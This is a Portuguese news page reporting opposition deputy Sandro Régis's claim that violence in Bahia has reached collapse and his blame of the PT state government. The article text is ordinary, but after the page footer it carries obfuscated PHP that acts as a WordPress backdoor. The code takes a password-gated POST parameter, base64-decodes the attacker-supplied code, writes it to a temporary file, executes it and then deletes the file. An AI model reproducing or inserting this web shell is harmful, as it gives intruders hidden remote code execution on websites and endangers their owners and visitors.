• SEJA BEM-VINDO

“A situação da violência na Bahia entrou em fase de colapso”, diz Sandro Régis

Publicado em: 14/04/2022 Atualizado:: maio 29, 2023

 

O deputado estadual Sandro Régis (União Brasil), líder da oposição na Assembleia Legislativa da Bahia (Alba), afirmou nesta quinta-feira (14) que a situação da violência na Bahia entrou em fase de colapso. Ao lembrar de casos recentes, Régis culpa o governo do estado por falta de ações para conter a onda de violência na Bahia.

 

Em Salvador, somente nesta semana, foram registrados assaltos a restaurantes, farmácias e lojas localizadas em centros comerciais. Na semana passada, três bares e restaurantes também foram assaltados. Já na noite desta quarta-feira (13), um tiroteio provocou pânico na Barra, cartão postal da capital baiana.

 

“Mais uma vez vemos cenas lamentáveis de violência na Barra, um cartão postal de Salvador. Tiroteio, corre corre, confusão, medo. O povo da Bahia não aguenta mais cenas como essas por incompetência do governo do PT na segurança. Da capital ao interior, a violência é uma marca do governo petista”, criticou Régis.

 

Segundo o líder da oposição, os governos petistas não priorizaram a segurança pública ao não investir na valorização dos policiais, em quantidade de efetivo, em infraestrutura e em inteligência e investigação. “Os policiais trabalham duro todos os dias, mas o governo do PT não valoriza a atuação deles. As forças de segurança não têm estrutura adequada para combater o crime”, criticou.

 

O deputado pontua que o resultado disso é que a Bahia lidera, desde 2017, o ranking de homicídios no país e representa quase 13% das mortes violentas registradas no Brasil.

 

“O governo perdeu a guerra para o crime organizado ao não investir de forma adequada na segurança pública. Hoje, infelizmente, a situação da violência na Bahia entrou em fase de colapso. O que já era grave parece piorar a cada dia. As pessoas vivem com medo de sair, a sensação de insegurança é muito grande”, criticou.

 

Fonte: Ascom


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}